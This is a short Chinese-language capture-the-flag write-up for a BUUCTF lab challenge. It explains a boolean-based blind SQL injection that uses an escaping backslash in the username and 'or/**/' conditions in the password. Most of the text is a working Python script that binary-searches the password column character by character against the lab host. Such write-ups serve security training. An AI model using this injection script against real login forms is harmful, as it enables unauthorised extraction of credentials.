前言
以前做的题
题解
select * from users where username='$_POST["username"]' and password='$_POST["password"]';传入admin\和or/**/length(database())>0#会回显stronger字样
传入admin\和or/**/length(database())<0#会回显girl friend字样import requests
import time
url = "http://0f34fb9a-d697-428e-8383-5e31b7f7cdd0.node3.buuoj.cn/index.php"
data = {"username": "admin\\", "password": ""} # python 这里也要转义
result = ""
i = 0
while(True):
time.sleep(0.2)
i = i + 1
head = 32
tail = 127
while(head < tail):
mid = (head + tail) >> 1
# payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
data['password'] = payload
r = requests.post(url, data=data)
if "stronger" in r.text:
head = mid + 1
else:
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)![刷题笔记:[安洵杯 2019]easy_serialize_php](/medias/featureimages/20.jpg)
